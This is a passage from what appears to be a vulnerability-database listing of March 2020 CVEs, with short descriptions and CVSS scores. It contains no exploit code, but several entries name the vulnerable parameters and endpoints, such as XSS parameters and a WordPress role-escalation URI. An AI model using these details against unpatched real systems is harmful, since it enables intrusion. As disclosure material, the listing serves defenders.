A cross-site scripting vulnerability was reported in the oVirt-engine's OAuth authorization endpoint before version 4.3.8.

4.3
2020-03-18 CVE-2019-20528 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp username parameter.

4.3
2020-03-18 CVE-2019-20512 Open EDX Cross-Site Scripting vulnerability in Open.Edx Ironwood .1

Open edX Ironwood.1 allows support/certificates?course_id= reflected XSS.

4.3
2020-03-18 CVE-2019-20511 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows blog?blog_category= Frame Injection.

4.3
2020-03-18 CVE-2019-12921 Graphicsmagick Information Exposure vulnerability in Graphicsmagick

In GraphicsMagick before 1.3.32, the text filename component allows remote attackers to read arbitrary files via a crafted image because of TranslateTextEx for SVG.

4.3
2020-03-18 CVE-2019-12370 Readdle Cross-Site Scripting vulnerability in Readdle Spark 2.0.2

The Spark application through 2.0.2 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12369 Typeapp Cross-Site Scripting vulnerability in Typeapp 1.9.5.35

The TypeApp application through 1.9.5.35 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12368 Edison Cross-Site Scripting vulnerability in Edison Mail 1.7.1

The Edison Mail application through 1.7.1 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12367 Blixhq Cross-Site Scripting vulnerability in Blixhq Bluemail 1.9.5.36

The BlueMail application through 1.9.5.36 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12366 9Folders Cross-Site Scripting vulnerability in 9Folders Nine 4.5.3A

The Nine application through 4.5.3a for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-12365 Cloudmagic Cross-Site Scripting vulnerability in Cloudmagic Newton 10.0.23

The Newton application through 10.0.23 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-10178 Dogtagpki Cross-Site Scripting vulnerability in Dogtagpki

It was found that the Token Processing Service (TPS) did not properly sanitize the Token IDs from the "Activity" page, enabling a Stored Cross Site Scripting (XSS) vulnerability.

4.3
2020-03-18 CVE-2020-6976 Deltaww Out-Of-Bounds Read vulnerability in Deltaww Cncsoft Screeneditor 1.00.88/1.00.96

Delta Industrial Automation CNCSoft ScreenEditor, v1.00.96 and prior.

4.3
2020-03-18 CVE-2020-4199 IBM Cross-Site Request Forgery (CSRF) vulnerability in IBM Tivoli Netcool/Omnibus 8.1.0

IBM Tivoli Netcool/OMNIbus 8.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.

4.3
2020-03-18 CVE-2020-9443 Zulipchat Cross-Site Scripting vulnerability in Zulipchat Zulip Desktop

Zulip Desktop before 4.0.3 loaded untrusted content in an Electron webview with web security disabled, which can be exploited for XSS in a number of ways.

4.3
2020-03-18 CVE-2019-14884 Moodle Cross-Site Scripting vulnerability in Moodle

A vulnerability was found in Moodle 3.7 before 3.73, 3.6 before 3.6.7 and 3.5 before 3.5.9, where a reflected XSS possible from some fatal error messages.

4.3
2020-03-18 CVE-2019-14883 Moodle Incorrect Authorization vulnerability in Moodle

A vulnerability was found in Moodle 3.6 before 3.6.7 and 3.7 before 3.7.3, where tokens used to fetch inline atachments in email notifications were not disabled when a user's account was no longer active.

4.3
2020-03-18 CVE-2019-14881 Moodle Cross-Site Scripting vulnerability in Moodle 3.7.0/3.7.1

A vulnerability was found in moodle 3.7 before 3.7.3, where there is blind XSS reflected in some locations where user email is displayed.

4.3
2020-03-17 CVE-2020-10114 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 84.0.20 allows stored self-XSS via the HTML file editor (SEC-535).

4.3
2020-03-17 CVE-2020-10113 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 84.0.20 allows self XSS via a temporary character-set specification (SEC-515).

4.3
2020-03-17 CVE-2019-20493 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 82.0.18 allows self-XSS because JSON string escaping is mishandled (SEC-520).

4.3
2020-03-16 CVE-2020-6175 Citrix Improper Certificate Validation vulnerability in Citrix Sd-Wan Center and Netscaler Sd-Wan Center

Citrix SD-WAN 10.2.x before 10.2.6 and 11.0.x before 11.0.3 has Missing SSL Certificate Validation.

4.3
2020-03-16 CVE-2019-19613 Halvotec Open Redirect vulnerability in Halvotec Raquest 10.23.10801.0

An issue was discovered in Halvotec RaQuest 10.23.10801.0.

4.3
2020-03-16 CVE-2020-10242 Joomla Cross-Site Scripting vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

4.3
2020-03-16 CVE-2019-19211 Dolibarr Cross-Site Scripting vulnerability in Dolibarr

Dolibarr ERP/CRM before 10.0.3 has an Insufficient Filtering issue that can lead to user/card.php XSS.

4.3
2020-03-16 CVE-2019-14512 Limesurvey Cross-Site Scripting vulnerability in Limesurvey 3.17.7+190627

LimeSurvey 3.17.7+190627 has XSS via Boxes in application/extensions/PanelBoxWidget/views/box.php or a label title in application/views/admin/labels/labelview_view.php.

4.3
2020-03-16 CVE-2018-10125 Contao Cross-Site Scripting vulnerability in Contao

Contao before 4.5.7 has XSS in the system log.

4.3
2020-03-20 CVE-2020-8139 Nextcloud Missing Authorization vulnerability in Nextcloud Server

A missing access control check in Nextcloud Server < 18.0.1, < 17.0.4, and < 16.0.9 causes hide-download shares to be downloadable when appending /download to the URL.

4.0
2020-03-20 CVE-2020-8138 Nextcloud Server-Side Request Forgery (SSRF) vulnerability in Nextcloud Server

A missing check for IPv4 nested inside IPv6 in Nextcloud server < 17.0.1, < 16.0.7, and < 15.0.14 allowed a Server-Side Request Forgery (SSRF) vulnerability when subscribing to a malicious calendar URL.

4.0
2020-03-20 CVE-2020-10194 Zimbra Incorrect Authorization vulnerability in Zimbra Zm-Mailbox

cs/service/account/AutoCompleteGal.java in Zimbra zm-mailbox before 8.8.15.p8 allows authenticated users to request any GAL account.

4.0
2020-03-20 CVE-2019-15664 Killernetworking Out-Of-Bounds Read vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

4.0
2020-03-20 CVE-2019-15663 Killernetworking Out-Of-Bounds Read vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

4.0
2020-03-20 CVE-2019-15662 Killernetworking Out-Of-Bounds Read vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

4.0
2020-03-20 CVE-2019-19486 Centreon Path Traversal vulnerability in Centreon

Local File Inclusion in minPlayCommand.php in Centreon (19.04.4 and below) allows an attacker to traverse paths via a plugin test.

4.0
2020-03-20 CVE-2019-19026 Cncf
Pivotal
SQL Injection vulnerability in multiple products

Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via project quotas in the VMware Harbor Container Registry for the Pivotal Platform.

4.0
2020-03-19 CVE-2019-16062 Netsas Missing Encryption of Sensitive Data vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior does not encrypt sensitive data stored within the SQL database.

4.0
2020-03-19 CVE-2019-14878 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __d2b function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14877 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __mdiff function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate big integers, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14876 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __lshift function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14875 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __multiply function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14874 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __i2b function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14873 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __multadd function of the newlib libc library, prior to versions 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2020-4203 IBM Information Exposure vulnerability in IBM Datapower Gateway

IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.8 could potentially disclose highly sensitive information to a privileged user due to improper access controls.

4.0
2020-03-19 CVE-2019-14872 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

The _dtoa_r function of the newlib libc library, prior to version 3.3.0, performs multiple memory allocations without checking their return value.

4.0
2020-03-18 CVE-2019-19677 Arxes Tolina Information Exposure vulnerability in Arxes-Tolina 3.0.0

arxes-tolina 3.0.0 allows User Enumeration.

4.0
2020-03-18 CVE-2020-10365 Logicaldoc SQL Injection vulnerability in Logicaldoc

LogicalDoc before 8.3.3 allows SQL Injection.

4.0
2020-03-18 CVE-2019-12122 Onap Cleartext Transmission of Sensitive Information vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP Portal through Dublin.

4.0
2020-03-18 CVE-2019-14871 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

The REENT_CHECK macro (see newlib/libc/include/sys/reent.h) as used by REENT_CHECK_TM, REENT_CHECK_MISC, REENT_CHECK_MP and other newlib macros in versions prior to 3.3.0, does not check for memory allocation problems when the DEBUG flag is unset (as is the case in production firmware builds).

4.0
2020-03-18 CVE-2020-10659 Entrustdatacard Improper Certificate Validation vulnerability in Entrustdatacard Entelligence Security Provider

Entrust Entelligence Security Provider (ESP) before 10.0.60 on Windows mishandles errors during SSL Certificate Validation, leading to situations where (for example) a user continues to interact with a web site that has an invalid certificate chain.

4.0
2020-03-17 CVE-2019-20495 Cpanel Information Exposure vulnerability in Cpanel

cPanel before 82.0.18 allows attackers to read an arbitrary database via MySQL dump streaming (SEC-531).

4.0
2020-03-17 CVE-2019-20407 Atlassian Missing Authorization vulnerability in Atlassian Jira Software Data Center

The ConfigureBambooRelease resource in Jira Software and Jira Software Data Center before version 8.6.1 allows authenticated remote attackers to view release version information in projects that they do not have access to through an missing authorisation check.

4.0
2020-03-17 CVE-2019-20105 Atlassian Missing Authentication FOR Critical Function vulnerability in Atlassian Application Links

The EditApplinkServlet resource in the Atlassian Application Links plugin before version 5.4.20, from version 6.0.0 before version 6.0.12, from version 6.1.0 before version 6.1.2, from version 7.0.0 before version 7.0.1, and from version 7.1.0 before version 7.1.3 allows remote attackers who have obtained access to administrator's session to access the EditApplinkServlet resource without needing to re-authenticate to pass "WebSudo" in products that support "WebSudo" through an improper access control vulnerability.

4.0
2020-03-16 CVE-2020-9472 Umbraco Unrestricted Upload of File With Dangerous Type vulnerability in Umbraco CMS 8.5.3

Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.

4.0
2020-03-16 CVE-2020-7916 Thimpress Improper Privilege Management vulnerability in Thimpress Learnpress

be_teacher in class-lp-admin-ajax.php in the LearnPress plugin 3.2.6.5 and earlier for WordPress allows any registered user to assign itself the teacher role via the wp-admin/admin-ajax.php?action=learnpress_be_teacher URI without any additional permission checks.

4.0
2020-03-16 CVE-2019-19946 Dradisframework Information Exposure vulnerability in Dradisframework Dradis 3.4.1

The API in Dradis Pro 3.4.1 allows any user to extract the content of a project, even if this user is not part of the project team.

4.0
2020-03-16 CVE-2020-6584 Nagios Improper Privilege Management vulnerability in Nagios 2.1.3

Nagios Log Server 2.1.3 has Incorrect Access Control.

4.0
2020-03-16 CVE-2019-4656 IBM
HP
Linux
Microsoft
Oracle
Improper Input Validation vulnerability in IBM MQ, MQ Appliance and Websphere MQ

IBM MQ and IBM MQ Appliance 7.1, 7.5, 8.0, 9.0 LTS, 9.1 LTS, and 9.1 CD is vulnerable to a denial of service attack that would allow an authenticated user to crash the queue and require a restart due to an error processing error messages.

4.0
2020-03-16 CVE-2019-10091 Apache Improper Certificate Validation vulnerability in Apache Geode 1.9.0

When TLS is enabled with ssl-endpoint-identification-enabled set to true, Apache Geode fails to perform hostname verification of the entries in the certificate SAN during the SSL handshake.

4.0

45 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-16 CVE-2020-6581 Nagios
Fedoraproject
Injection vulnerability in multiple products

Nagios NRPE 3.2.1 has Insufficient Filtering because, for example, nasty_metachars interprets \n as the character \ and the character n (not as the \n newline sequence).

3.7
2020-03-20 CVE-2020-1879 Huawei Improper Validation of Integrity Check Value vulnerability in Huawei products

There is an improper integrity checking vulnerability on some huawei products.

3.6
2020-03-16 CVE-2020-1735 Redhat Path Traversal vulnerability in Redhat products

A flaw was found in the Ansible Engine when the fetch module is used.

3.6
2020-03-16 CVE-2019-4617 IBM
Linux
Session Fixation vulnerability in IBM Cloud Automation Manager 3.2.1.0

IBM Cloud Automation Manager 3.2.1.0 does not renew a session variable after a successful authentication which could lead to session fixation/hijacking vulnerability.

3.6
2020-03-22 CVE-2020-10821 Nagios Cross-Site Scripting vulnerability in Nagios XI 5.6.11

Nagios XI 5.6.11 allows XSS via the account/main.php theme parameter.

3.5
2020-03-22 CVE-2020-10820 Nagios Cross-Site Scripting vulnerability in Nagios XI 5.6.11

Nagios XI 5.6.11 allows XSS via the includes/components/ldap_ad_integration/ password parameter.

3.5
2020-03-22 CVE-2020-10819 Nagios Cross-Site Scripting vulnerability in Nagios XI 5.6.11

Nagios XI 5.6.11 allows XSS via the includes/components/ldap_ad_integration/ username parameter.

3.5
2020-03-22 CVE-2020-10803 Phpmyadmin
Debian
Cross-Site Scripting vulnerability in multiple products

In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was discovered where malicious code could be used to trigger an XSS attack through retrieving and displaying results (in tbl_get_field.php and libraries/classes/Display/Results.php).

3.5
2020-03-20 CVE-2020-1696 Redhat
Dogtagpki
Cross-Site Scripting vulnerability in multiple products

A flaw was found in the all pki-core 10.x.x versions, where Token Processing Service (TPS) where it did not properly sanitize Profile IDs, enabling a Stored Cross-Site Scripting (XSS) vulnerability when the profile ID is printed.

3.5
2020-03-20 CVE-2020-10681 Cmsmadesimple Cross-Site Scripting vulnerability in Cmsmadesimple CMS Made Simple 2.2.13

The Filemanager in CMS Made Simple 2.2.13 has stored XSS via a .pxd file, as demonstrated by m1_files[] to admin/moduleinterface.php.

3.5
2020-03-19 CVE-2020-5267 Rubyonrails
Debian
Improper Neutralization of Script-Related Html Tags in A web Page (Basic XSS) vulnerability in multiple products

In ActionView before versions 6.0.2.2 and 5.2.4.2, there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers.

3.5
2020-03-19 CVE-2019-16375 Otrs Cross-Site Scripting vulnerability in Otrs

An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.11, and Community Edition 5.0.x through 5.0.37 and 6.0.x through 6.0.22.

3.5
2020-03-19 CVE-2019-16010 Cisco Cross-Site Scripting vulnerability in Cisco Sd-Wan Firmware

A vulnerability in the web UI of the Cisco SD-WAN vManage software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the vManage software.

3.5
2020-03-18 CVE-2020-7258 Mcafee Cross-Site Scripting vulnerability in Mcafee Network Security Manager

Cross site scripting vulnerability in McAfee Network Security Management (NSM) Prior to 9.1 update 6 Mar 2020 Update allows attackers to unspecified impact via unspecified vectors.

3.5
2020-03-18 CVE-2020-7256 Mcafee Cross-Site Scripting vulnerability in Mcafee Network Security Manager

Cross site scripting vulnerability in McAfee Network Security Management (NSM) Prior to 9.1 update 6 Mar 2020 Update allows attackers to unspecified impact via unspecified vectors.

3.5
2020-03-17 CVE-2020-1720 Postgresql
Redhat
Missing Authorization vulnerability in multiple products

A flaw was found in PostgreSQL's "ALTER ...

3.5
2020-03-17 CVE-2020-10596 Opencart Cross-Site Scripting vulnerability in Opencart 3.0.3.2

OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section.

3.5
2020-03-17 CVE-2019-20497 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 82.0.18 allows stored XSS via WHM Backup Restoration (SEC-533).

3.5
2020-03-17 CVE-2020-6646 Fortinet Cross-Site Scripting vulnerability in Fortinet Fortiweb

An improper neutralization of input vulnerability in FortiWeb allows a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the Disclaimer Description of a Replacement Message.

3.5
2020-03-16 CVE-2019-19852 Sangoma Cross-Site Scripting vulnerability in Sangoma Freepbx

An XSS Injection vulnerability exists in Sangoma FreePBX and PBXact 13, 14, and 15 within the Call Event Logging report screen in the cel module at the admin/config.php?display=cel URI via date fields.

3.5
2020-03-16 CVE-2019-19615 Sangoma Cross-Site Scripting vulnerability in Sangoma Freepbx 14.0.10.2/14.0.10.3/14.0.10.7

Multiple XSS vulnerabilities exist in the Backup & Restore module \ v14.0.10.2 through v14.0.10.7 for FreePBX, as shown at /admin/config.php?display=backup on the FreePBX Administrator web site.

3.5
2020-03-16 CVE-2019-19612 Halvotec Cross-Site Scripting vulnerability in Halvotec Raquest 10.23.10801.0

An issue was discovered in Halvotec RaQuest 10.23.10801.0.

3.5
2020-03-16 CVE-2019-19461 Teampasswordmanager Cross-Site Scripting vulnerability in Teampasswordmanager Team Password Manager

Post-authentication Stored XSS in Team Password Manager through 7.93.204 allows attackers to steal other users' credentials by creating a shared password with HTML code as the title.

3.5
2020-03-16 CVE-2020-6586 Nagios Cross-Site Scripting vulnerability in Nagios 2.1.3

Nagios Log Server 2.1.3 allows XSS by visiting /profile and entering a crafted name field that is mishandled on the /admin/users page.

3.5
2020-03-16 CVE-2019-19941 Swisscom Cross-Site Scripting vulnerability in Swisscom Centro Grande Firmware 6.12.02/6.14.00

Missing hostname validation in Swisscom Centro Grande before 6.16.12 allows a remote attacker to inject its local IP address as a domain entry in the DNS service of the router via crafted hostnames in DHCP requests, causing XSS.

3.5
2020-03-16 CVE-2019-19851 Sangoma Cross-Site Scripting vulnerability in Sangoma Freepbx

An XSS Injection vulnerability exists in Sangoma FreePBX and PBXact 13, 14, and 15 within the Debug/Test page of the Superfecta module at the admin/config.php?display=superfecta URI.

3.5
2020-03-16 CVE-2019-19210 Dolibarr Cross-Site Scripting vulnerability in Dolibarr

Dolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.

3.5
2020-03-19 CVE-2019-20485 Redhat
Debian
Improper Input Validation vulnerability in multiple products

qemu/qemu_driver.c in libvirt before 6.0.0 mishandles the holding of a monitor job during a query to a guest agent, which allows attackers to cause a denial of service (API blockage).

2.7
2020-03-18 CVE-2019-10146 Redhat
Dogtagpki
Cross-Site Scripting vulnerability in multiple products

A Reflected Cross Site Scripting flaw was found in all pki-core 10.x.x versions module from the pki-core server due to the CA Agent Service not properly sanitizing the certificate request page.

2.6
2020-03-16 CVE-2020-1738 Redhat Argument Injection OR Modification vulnerability in Redhat products

A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified.

2.6
2020-03-20 CVE-2020-1878 Huawei Improper Authentication vulnerability in Huawei Oxfords-An00A Firmware

Huawei smartphone OxfordS-AN00A with versions earlier than 10.0.1.152D(C735E152R3P3),versions earlier than 10.0.1.160(C00E160R4P1) have an improper authentication vulnerability.

2.1
2020-03-20 CVE-2020-1862 Huawei Double Free vulnerability in Huawei Campusinsight and Manageone

There is a double free vulnerability in some Huawei products.

2.1
2020-03-20 CVE-2020-1795 Huawei Unspecified vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is a logic error vulnerability in several smartphones.

2.1
2020-03-20 CVE-2020-1794 Huawei Improper Authentication vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is an improper authentication vulnerability in several smartphones.

2.1
2020-03-20 CVE-2020-1793 Huawei Improper Authentication vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is an improper authentication vulnerability in several smartphones.

2.1
2020-03-19 CVE-2020-5262 Easybuild Project Insecure Storage of Sensitive Information vulnerability in Easybuild Project Easybuild

In EasyBuild before version 4.1.2, the GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like `--new-pr`, `--fro,-pr`, etc.) is shown in plain text in EasyBuild debug log files.

2.1
2020-03-18 CVE-2019-19335 Redhat Incorrect Permission Assignment FOR Critical Resource vulnerability in Redhat Openshift 4.0/4.2

During installation of an OpenShift 4 cluster, the `openshift-install` command line tool creates an `auth` directory, with `kubeconfig` and `kubeadmin-password` files.

2.1
2020-03-17 CVE-2020-3951 Vmware Out-Of-Bounds Write vulnerability in VMWare Horizon Client and Workstation

VMware Workstation (15.x before 15.5.2) and Horizon Client for Windows (5.x and prior before 5.4.0) contain a denial-of-service vulnerability due to a heap-overflow issue in Cortado Thinprint.

2.1
2020-03-17 CVE-2019-20494 Cpanel Improper Input Validation vulnerability in Cpanel

In cPanel before 82.0.18, Cpanel::Rand::Get can produce a predictable series of numbers (SEC-525).

2.1
2020-03-16 CVE-2020-6980 Rockwellautomation Cleartext Storage of Sensitive Information vulnerability in Rockwellautomation products

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, If Simple Mail Transfer Protocol (SMTP) account data is saved in RSLogix 500, a local attacker with access to a victim’s project may be able to gather SMTP server authentication data as it is written to the project file in cleartext.

2.1
2020-03-16 CVE-2020-1736 Redhat Incorrect Permission Assignment FOR Critical Resource vulnerability in Redhat products

A flaw was found in Ansible Engine when a file is moved using atomic_move primitive as the file mode cannot be specified.

2.1
2020-03-16 CVE-2019-4719 IBM
HP
Linux
Microsoft
Oracle
Unspecified vulnerability in IBM MQ, MQ Appliance and Websphere MQ

IBM MQ and IBM MQ Appliance 7.1, 7.5, 8.0, 9.0 LTS, 9.1 LTS, and 9.1 CD could allow a local attacker to obtain sensitive information by inclusion of sensitive data within runmqras data.

2.1
2020-03-16 CVE-2019-4619 IBM
HP
Linux
Microsoft
Oracle
Information Exposure Through AN Error Message vulnerability in IBM MQ, MQ Appliance and Websphere MQ

IBM MQ and IBM MQ Appliance 7.1, 7.5, 8.0, 9.0 LTS, 9.1 LTS, and 9.1 CD could allow a local attacker to obtain sensitive information by inclusion of sensitive data within trace.

2.1
2020-03-16 CVE-2020-1753 Redhat Information Exposure Through LOG Files vulnerability in Redhat Ansible Engine

A security flaw was found in Ansible Engine, all Ansible 2.7.x versions prior to 2.7.17, all Ansible 2.8.x versions prior to 2.8.11 and all Ansible 2.9.x versions prior to 2.9.7, when managing kubernetes using the k8s module.

2.1
2020-03-16 CVE-2020-1740 Redhat Information Exposure vulnerability in Redhat products

A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files.

1.9